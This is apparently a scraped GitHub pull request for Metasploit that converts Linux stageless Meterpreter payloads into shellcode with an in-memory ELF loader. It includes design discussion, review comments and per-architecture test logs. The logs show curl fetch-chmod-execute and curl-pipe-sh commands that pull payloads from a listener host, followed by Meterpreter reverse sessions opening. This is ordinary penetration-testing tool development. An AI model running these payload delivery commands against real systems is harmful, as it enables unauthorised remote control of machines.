Fix Linux Stageless Payload to be Shellcodes #19799

dledda-r7 · 2025-01-10T15:07:26Z

This PR Fixes the issue of linux stageless meterpreter.
Issue: #19670

Issue Description

The stageless linux meterpreters are ELF files that cannot be used as standard stageless shellcode payload.

Staged vs Stageless Linux Meterpreter

Staged

The Linux staged meterpreter is divided in 3 component

A stager (connect back to msf to download the next stage)
an intermediate stager that download the ELF on a RWX mmap, setup the stack and and jump on the e_entry of the ELF
the Process Hollowing Friendly version of mettle's ELF

This version of the ELF is generated when we build mettle using the following tool: elf2bin

Stageless

The stageless mettle payload is the ELF file (standard elf) with the patched args.

Code Handling Staged vs Stageless

Mettle main.c

	/*
	 * Check to see if we were injected by metasploit | staged
	 */
	if (strcmp(argv[0], "m") == 0) {
		flags |= PAYLOAD_INJECTED;

		/*
		 * There is a fd sitting here, trust me
		 */
		int fd = (int)((long *)argv)[1];
		char *uri;
		if (asprintf(&uri, "fd://%d", fd) > 0) {
			struct c2 *c2 = mettle_get_c2(m);
			c2_add_transport_uri(c2, uri);
			free(uri);
		}
		parse_default_args(m, flags);
	} else {

#ifndef HAVE_SETPROCTITLE
		/* Prepare for later setproctitle emulation */
		saved_argv = calloc(argc + 1, sizeof(*saved_argv));
		for (int i = 0; i < argc; i++) {
			saved_argv[i] = strdup(argv[i]);
		}
		compat_init_setproctitle(argc, argv);
		argv = saved_argv;
#endif

		parse_default_args(m, flags);    // <- MSFVENOM REPLACE THE DEFAULT OPTION PARSED HERE
		if (parse_cmdline(argc, argv, m, flags)) {
			return -1;
		}
	}

Solution

For each architecture, a shellcode implementing this technique was made.
NOTE: This technique works only with Kernel >= 3.17

Instead of delivering the ELF only, the raw shellcode will be composed by the in-memory-loader arch specific shellcode and the elf file at the end of it.

Super thanks to @msutovsky-r7

What architectures fix this pr:

What is inside the PR and How to test it

The <arch>/in_memory_loader.rb include the architecture specific shellcode to be prepended to the ELF binary.
The addition to an empty <arch>/prepends.rb mixin for the missing architectures.
Templates ELF binary and sources for missing architectures.
The creation of a Mettle-specific datastore option for the selection of the binary compatibility to 2.6 or to 3.17 kernels.
warning display if a prepends is applied when the kernel ds option is 2.6.
Modification of the meterpreter_reverse.erb template for payload generation.

What to test

Ensure the ELF delivered when MeterpreterLinuxMinKernel is 2.6+ is the same as before
Ensure the ELF delivered when MeterpreterLinuxMinKernel is 3.17 is using the correct ELF template and is executed on a compatible target.
Ensure the prepends are applied on the payload when MeterpreterLinuxMinKernel is 3.17 otherwise a warning is showed.

lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb

bwatters-r7 · 2025-04-15T22:04:24Z

This makes a lot of sense- my only complaint is that we need to comment the asm a lot more, especially when you're doing shenanigans. 😆

bwatters-r7 · 2025-04-16T20:13:32Z

Also, what are you using to test this? Do you have a elf that supports injection, or are you only testing by creating an elf stager from the shellcode?

msutovsky-r7 · 2025-04-17T06:07:17Z

Also, what are you using to test this? Do you have a elf that supports injection, or are you only testing by creating an elf stager from the shellcode?

I generated ELF file using msfvenom and for actual testing, I used mostly qemu-static-[arch]. For some architectures, that was bit problem, like s390, so in that case, I had Linux OS running through qemu. So generally, for testing, I used qemu.

data/templates/src/elf/exe/elf_armbe_template.s

data/templates/src/elf/exe/elf_ppc64le_template.s

modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb

lib/msf/base/sessions/mettle_config.rb

bwatters-r7

Minor cheat sheet additions

lib/msf/base/sessions/mettle_config.rb

lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb

lib/msf/core/payload/linux/armbe/meterpreter_loader.rb

lib/msf/core/payload/linux/armle/meterpreter_loader.rb

lib/msf/core/payload/linux/mipsle/meterpreter_loader.rb

lib/msf/core/payload/linux/ppc/meterpreter_loader.rb

lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb

lib/msf/core/payload/linux/ppce500v2/meterpreter_loader.rb

lib/msf/core/payload/linux/zarch/meterpreter_loader.rb

bwatters-r7 · 2025-06-10T13:33:03Z

lib/msf/core/payload/linux/mips64/meterpreter_loader.rb

+    size_l = size & 0x0000ffff
+    in_memory_loader = [
+      # "call" 0x1004, address of the next instruction is stored in $ra
+      0x04110000, # 0x1000:	bal	0x1004	0x04110000


For my own curiosity:
In the ARM and AMD64 assembly, you're doing the memfd_create before hopping to the end and calling a branch and link, so the return address is after our shellcode.
In MIPS you're doing the branch and link before the memfd_create, giving a return address before our shellcode.
In PPC, you're doing the branch and link before the memfd_create, but the RA is still after everything, so the RA is again at the end of our shellcode.
Is there a reason to have the RA point to the beginning, middle, or end of shellcode based on architecture?

With MIPS I was having some issues doing it in the canonical way (which I would consider the the x64 one), also before the changes to execveat I was using the $ra to do the itoa first and than adding +2 to point to the start of the ELF on the end of the shellcode, so it really didn't matter where it was pointing first as I had anyway to do some offset manipulation, if you think is a blocker we can standardize it. by looking at other shellcodes/stubs in framework i really doubt anybody will ever contribute to them but I am open to make the the code more standardize if you think is worth it

Not a blocker at all- I just noticed a difference and did not know why it would make a difference, so I figured I'd ask.

bwatters-r7 · 2025-06-10T18:41:04Z

lib/msf/core/payload/linux/prepends.rb

      app << appends_map.fetch(name) if datastore[name]
    end
+    if ds['MeterpreterLinuxMinKernel'] == '2.6+' && (!pre.empty? || !app.empty?) && !staged?
+      print_warning('Prepends options only works with MeterpreterLinuxMinKernel = 3.17+.')


Suggested change

print_warning('Prepends options only works with MeterpreterLinuxMinKernel = 3.17+.')

print_warning('Prepend options only work with MeterpreterLinuxMinKernel = 3.17+.')

lib/msf/base/sessions/mettle_config.rb

bwatters-r7 · 2025-06-10T19:45:41Z

x64

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use payload/cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 3.17+ 
MeterpreterLinuxMinKernel => 3.17+
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set prependsetuid true 
prependsetuid => true
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > to_handler
[*] Command served: curl -so ./YcZpMZsOWVJ http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w;chmod +x ./YcZpMZsOWVJ;./YcZpMZsOWVJ&
[*] Command to run on remote host: curl -s http://10.5.135.201:8080/aoG3_q_U5dSCB61zrJpJEQ|sh
[*] Payload Handler Started as Job 2
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /s-Ca9BmTKo-IpFX8XiUd8w
[*] Adding resource /aoG3_q_U5dSCB61zrJpJEQ
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Client 10.5.134.164 requested /aoG3_q_U5dSCB61zrJpJEQ
[*] Sending payload to 10.5.134.164 (curl/7.81.0)
[*] Client 10.5.134.164 requested /s-Ca9BmTKo-IpFX8XiUd8w
[*] Sending payload to 10.5.134.164 (curl/7.81.0)
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.164:41258) at 2025-06-10 14:44:18 -0500

msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.134.164
OS           : Ubuntu 22.04 (Linux 6.8.0-1028-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

bwatters-r7 · 2025-06-10T20:17:56Z

AARCH64

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 3.17+ 
MeterpreterLinuxMinKernel => 3.17+
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set prependsetuid true
prependsetuid => true
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set verbose true
verbose => true
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SDeLtHAov http://10.5.135.201:8080/TQMDQzG-j3qlgupsFHwcUQ;chmod +x ./SDeLtHAov;./SDeLtHAov&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /TQMDQzG-j3qlgupsFHwcUQ
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Client 10.5.132.214 requested /TQMDQzG-j3qlgupsFHwcUQ
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Meterpreter session 2 opened (10.5.135.201:4585 -> 10.5.132.214:48214) at 2025-06-10 14:47:11 -0500

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.132.214
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: kali

bwatters-r7 · 2025-06-11T19:02:24Z

ARMLE

msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > set meterpreterlinuxminkernel 3.17+ 
meterpreterlinuxminkernel => 3.17+
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > set prependsetuid true 
prependsetuid => true
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./WZmRLbLOTRP http://10.5.135.201:8080/OcFXJxS3XJGwQI9E1fvCLA;chmod +x ./WZmRLbLOTRP;./WZmRLbLOTRP&
[*] Payload Handler Started as Job 0
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /OcFXJxS3XJGwQI9E1fvCLA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.212 requested /OcFXJxS3XJGwQI9E1fvCLA
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.212:42594) at 2025-06-11 14:01:42 -0500

msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.212
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid

bwatters-r7 · 2025-06-11T21:48:59Z

MIPSLE

This fails with segfault. I'm running it on a router, so I cannot get GDB installed, but gdb server works.

(gdb) target remote 10.5.134.135:6785
Remote debugging using 10.5.134.135:6785
Reading /home/ubnt/nHMEUdqNk from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /home/ubnt/nHMEUdqNk from remote target...
Reading symbols from target:/home/ubnt/nHMEUdqNk...
(No debugging symbols found in target:/home/ubnt/nHMEUdqNk)
Reading /usr/lib/debug/.build-id/5a/dc2f32cfab9c3295eff7905db52e01ef1771f0.debug from remote target...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
0x00400054 in ?? ()
(gdb) start
The "remote" target does not support "run".  Try "help target" or "continue".
(gdb) continue
Continuing.
process 3834 is executing new program: /memfd: (deleted)
Reading /memfd: (deleted) from remote target...
warning: "target:/memfd: (deleted)": could not open as an executable file: No such file or directory.
Reading /memfd: (deleted) from remote target...
warning: `target:/memfd: (deleted)': can't open to read symbols: No such file or directory.

Program received signal SIGSEGV, Segmentation fault.
0x77fb5dd0 in ?? ()

Linux version:

ubnt@ubnt:~$ Linux ubnt 4.14.54-UBNT #1 SMP Thu Jun 15 09:00:10 UTC 2023 mips GNU/Linux

EDIT
The "legacy" meterpreter works.

msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 2.6+ 
MeterpreterLinuxMinKernel => 2.6+
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set prependsetuid false
prependsetuid => false
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./ViIsYiXmd http://10.5.135.201:8080/CT_Drzu24xtplYEAbOltEg;chmod +x ./ViIsYiXmd;./ViIsYiXmd&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /CT_Drzu24xtplYEAbOltEg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.134.135 requested /CT_Drzu24xtplYEAbOltEg
[*] Sending payload to 10.5.134.135 (curl/7.52.1)
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.135:33584) at 2025-06-11 16:58:28 -0500

lib/msf/base/sessions/mettle_config.rb

msutovsky-r7 · 2025-06-12T10:23:28Z

MIPSLE

This fails with segfault. I'm running it on a router, so I cannot get GDB installed, but gdb server works.

(gdb) target remote 10.5.134.135:6785
Remote debugging using 10.5.134.135:6785
Reading /home/ubnt/nHMEUdqNk from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /home/ubnt/nHMEUdqNk from remote target...
Reading symbols from target:/home/ubnt/nHMEUdqNk...
(No debugging symbols found in target:/home/ubnt/nHMEUdqNk)
Reading /usr/lib/debug/.build-id/5a/dc2f32cfab9c3295eff7905db52e01ef1771f0.debug from remote target...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
0x00400054 in ?? ()
(gdb) start
The "remote" target does not support "run".  Try "help target" or "continue".
(gdb) continue
Continuing.
process 3834 is executing new program: /memfd: (deleted)
Reading /memfd: (deleted) from remote target...
warning: "target:/memfd: (deleted)": could not open as an executable file: No such file or directory.
Reading /memfd: (deleted) from remote target...
warning: `target:/memfd: (deleted)': can't open to read symbols: No such file or directory.

Program received signal SIGSEGV, Segmentation fault.
0x77fb5dd0 in ?? ()

Linux version:

ubnt@ubnt:~$ Linux ubnt 4.14.54-UBNT #1 SMP Thu Jun 15 09:00:10 UTC 2023 mips GNU/Linux

EDIT The "legacy" meterpreter works.

msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 2.6+ 
MeterpreterLinuxMinKernel => 2.6+
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set prependsetuid false
prependsetuid => false
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./ViIsYiXmd http://10.5.135.201:8080/CT_Drzu24xtplYEAbOltEg;chmod +x ./ViIsYiXmd;./ViIsYiXmd&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /CT_Drzu24xtplYEAbOltEg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.134.135 requested /CT_Drzu24xtplYEAbOltEg
[*] Sending payload to 10.5.134.135 (curl/7.52.1)
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.135:33584) at 2025-06-11 16:58:28 -0500

It's causing segfault on this instruction:

0x77fb5dd0    lb     $v0, ($a0)     <Cannot dereference [0]>

So the issue is with Meterpreter itself - on qemu, it seems to be working though.

UPDATE:
It seems like the issue is with execveat instruction, which works, but somehow, it's not. Everything works as expected until that syscall - running file descriptor from different shell will run meterpreter. But somehow, spawning process with execveat breaks something and the meterpreter doesn't work.

…ning on prepends usage

lib/msf/core/payload/linux/mipsbe/prepends.rb

bwatters-r7 · 2025-09-24T15:44:00Z

lib/msf/core/payload/linux/mipsle/prepends.rb

+#
+# Linux ppc prepends
+#
+module Msf::Payload::Linux::Mipsle::Prepends


I am, in fact, crazy

bwatters-r7 · 2025-09-24T15:54:37Z

lib/msf/util/exe.rb


-      # XXX: Add remaining AARCH64 systems here
-    end
+        if arch.index(ARCH_PPC) && plat.index(Msf::Module::Platform::OSX)


If we are going to remove the PPC, do we need the ppc files in here? We have templates, prepends, payloads, and a loader in this PR?
Also, it might be a good idea to change the error message above, since the problem is not that we don't support the arch or platform, we don't support the Minimum kernel level:

msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > set PayloadLinuxMinKernel 3.17+ PayloadLinuxMinKernel => 3.17+ msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > to_handler [-] Exploit failed: Failed to generate an executable payload due to an invalid platform or arch. msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > set PayloadLinuxMinKernel 2.6+ PayloadLinuxMinKernel => 2.6+ msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > to_handler [*] Command to run on remote host: curl -so ./loAlOlFnqst http://10.5.135.201:8080/JY-6pdFD6VFwW21Ds-tzNQ;chmod +x ./loAlOlFnqst;./loAlOlFnqst&

Co-authored-by: Brendan <[email protected]>

modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb

modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb

modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb

bwatters-r7 · 2025-10-28T21:10:20Z

msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./MYTRDUzk http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA;chmod +x ./MYTRDUzk;./MYTRDUzk&
[*] Payload Handler Started as Job 2
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.224 requested /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.224:43288) at 2025-10-28 16:04:18 -0500

msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.9.79-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : mips64/linux
meterpreter > getuid
Server username: ubnt
meterpreter > exit
[*] Shutting down session: 1

[*] 10.5.132.224 - Meterpreter session 1 closed.  Reason: User exit
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > [*] 10.5.132.224 - Meterpreter session 1 closed.  Reason: Died

msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > set PayloadLinuxMinKernel 3.17 
PayloadLinuxMinKernel => 3.17
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SsMEzUcPWTv http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA;chmod +x ./SsMEzUcPWTv;./SsMEzUcPWTv&
[*] Payload Handler Started as Job 3
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /8Z4ZAzIC6g6LyRMRHt_ybA
[-] Exploit failed: RuntimeError unknown: Failed to add resource
bad-config: Resource collision detected. Set FETCH_URIPATH to a different value to continue.
Interrupt: use the 'exit' command to quit
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SMwsvbqbCFdr http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA;chmod +x ./SMwsvbqbCFdr;./SMwsvbqbCFdr&
[*] Payload Handler Started as Job 4
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.224 requested /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Client 10.5.132.224 requested /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Sending payload to 10.5.132.224 (curl/7.52.1)

ubnt@ubnt:~$ curl -so ./SMwsvbqbCFdr http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA
ubnt@ubnt:~$ ls -l
total 3304
-rwxr-xr-x    1 ubnt     users      1685392 Jan  2 02:05 MYTRDUzk
-rwxr-xr-x    1 ubnt     users      1685612 Jan  2 02:08 SMwsvbqbCFdr
ubnt@ubnt:~$ chmod 755 SMwsvbqbCFdr
ubnt@ubnt:~$ ./SMwsvbqbCFdr
Bus error
ubnt@ubnt:~$

bwatters-r7 · 2025-10-28T21:44:45Z

dledda-r7 · 2025-10-31T10:31:43Z

@bwatters-r7 we are going to replace execveat back with the itoa + execve this might take a while. after that we will need to retest everything

msutovsky-r7 self-assigned this Jan 14, 2025

dledda-r7 force-pushed the fix/mettle-stageless-payload branch from b3f3b8c to 128ac84 Compare February 10, 2025 08:11

smcintyre-r7 added enhancement rn-payload-enhancement release notes for enhanced payloads labels Feb 14, 2025

dledda-r7 marked this pull request as ready for review February 14, 2025 11:36

dledda-r7 changed the title ~~[WIP] Fix Linux Stageless Payload to be Shellcodes~~ Fix Linux Stageless Payload to be Shellcodes Feb 14, 2025

msutovsky-r7 removed their assignment Feb 14, 2025

dledda-r7 mentioned this pull request Feb 20, 2025

Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64 #19850

Merged

msutovsky-r7 mentioned this pull request Feb 26, 2025

Fixing PPC64 template and payloads #19910

Merged

dledda-r7 added the payload label Mar 28, 2025

bwatters-r7 self-assigned this Apr 8, 2025

dledda-r7 mentioned this pull request Apr 9, 2025

MeterpreterOptions break-up and default extension loading removal #20012

Merged

11 tasks

bwatters-r7 reviewed Apr 15, 2025

View reviewed changes

lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb Outdated Show resolved Hide resolved

bwatters-r7 reviewed Apr 17, 2025

View reviewed changes

data/templates/src/elf/exe/elf_armbe_template.s Show resolved Hide resolved

data/templates/src/elf/exe/elf_ppc64le_template.s Show resolved Hide resolved

bwatters-r7 reviewed Apr 17, 2025

View reviewed changes

modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb Outdated Show resolved Hide resolved

msutovsky-r7 force-pushed the fix/mettle-stageless-payload branch from 2025792 to 56c4506 Compare May 12, 2025 09:58

smcintyre-r7 reviewed May 21, 2025

View reviewed changes

lib/msf/base/sessions/mettle_config.rb Outdated Show resolved Hide resolved

bwatters-r7 reviewed Jun 9, 2025

View reviewed changes

bwatters-r7 reviewed Jun 10, 2025

View reviewed changes

dledda-r7 force-pushed the fix/mettle-stageless-payload branch from 5192b65 to 0407bb7 Compare June 11, 2025 21:57

bcoles reviewed Jun 12, 2025

View reviewed changes

lib/msf/base/sessions/mettle_config.rb Outdated Show resolved Hide resolved

dledda-r7 and others added 11 commits September 23, 2025 05:50

fix: updating MeterpreterLinuxMinKernel default value, displaying war…

0c3103d

…ning on prepends usage

fix: align assembly comments, add single build instructions

ec14ed0

chore: linting meterpreter_loader and prepends

4c8e5ba

Adds convetion for each architecture

1aaeba0

Fixed comments

bcb43ec

fix: changes based on review comments

27f69bf

Fixing mipsbe loader stub

6e29b01

fix: update cached size

43b1677

fix: update cached size

07ff496

fix: update cached size

c3118cb

chore: remove white-space

38b63f5

dledda-r7 force-pushed the fix/mettle-stageless-payload branch from c0b3f51 to 38b63f5 Compare September 23, 2025 09:51

bwatters-r7 reviewed Sep 24, 2025

View reviewed changes

dledda-r7 and others added 2 commits September 25, 2025 11:10

Update lib/msf/core/payload/linux/mipsbe/prepends.rb

4cb91b7

Co-authored-by: Brendan <[email protected]>

fix: update util/exe.rb to support new linux templates, code refactoring

a27a0cb

dledda-r7 commented Sep 25, 2025

View reviewed changes

modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb Outdated Show resolved Hide resolved

Update modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb

7f5f264

dledda-r7 commented Sep 25, 2025

View reviewed changes

modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb Outdated Show resolved Hide resolved

Update modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb

dd8e5a3

dledda-r7 commented Sep 25, 2025

View reviewed changes

modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb Outdated Show resolved Hide resolved

dledda-r7 added 4 commits September 25, 2025 14:05

Update modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb

a3106eb

fix: minor fix linux elf templates

7e46f37

fix: removed + character in PayloadLinuxMinKernel

3b2a840

fix: fix linux prepends, uniform ppc prepends

b42b7e8

msutovsky-r7 added 3 commits October 31, 2025 12:37

Rolling back arm/arm64 to exec syscall

44b0917

Rolling back ppc/ppc64/ppce500v2 to exec syscall

9bec2e3

Rolling back zarch to exec syscall

8d29138

	print_warning('Prepends options only works with MeterpreterLinuxMinKernel = 3.17+.')
	print_warning('Prepend options only work with MeterpreterLinuxMinKernel = 3.17+.')

Fix Linux Stageless Payload to be Shellcodes #19799

Are you sure you want to change the base?

Fix Linux Stageless Payload to be Shellcodes #19799

Conversation

dledda-r7 commented Jan 10, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Issue Description

Staged vs Stageless Linux Meterpreter

Staged

Stageless

Code Handling Staged vs Stageless

Solution

What architectures fix this pr:

What is inside the PR and How to test it

What to test

Uh oh!

Uh oh!

bwatters-r7 commented Apr 15, 2025

Uh oh!

bwatters-r7 commented Apr 16, 2025

Uh oh!

msutovsky-r7 commented Apr 17, 2025

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

bwatters-r7 left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

bwatters-r7 Jun 10, 2025

Choose a reason for hiding this comment

Uh oh!

dledda-r7 Jun 11, 2025

Choose a reason for hiding this comment

Uh oh!

bwatters-r7 Jun 11, 2025

Choose a reason for hiding this comment

Uh oh!

bwatters-r7 Jun 10, 2025

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

bwatters-r7 commented Jun 10, 2025

x64

Uh oh!

bwatters-r7 commented Jun 10, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

AARCH64

Uh oh!

bwatters-r7 commented Jun 11, 2025

ARMLE

Uh oh!

bwatters-r7 commented Jun 11, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

MIPSLE

Uh oh!

Uh oh!

msutovsky-r7 commented Jun 12, 2025

MIPSLE

Uh oh!

Uh oh!

bwatters-r7 Sep 24, 2025

Choose a reason for hiding this comment

Uh oh!

bwatters-r7 Sep 24, 2025

Choose a reason for hiding this comment

Uh oh!

Uh oh!

dledda-r7 commented Jan 10, 2025 •

edited

Loading

bwatters-r7 commented Jun 10, 2025 •

edited

Loading

bwatters-r7 commented Jun 11, 2025 •

edited

Loading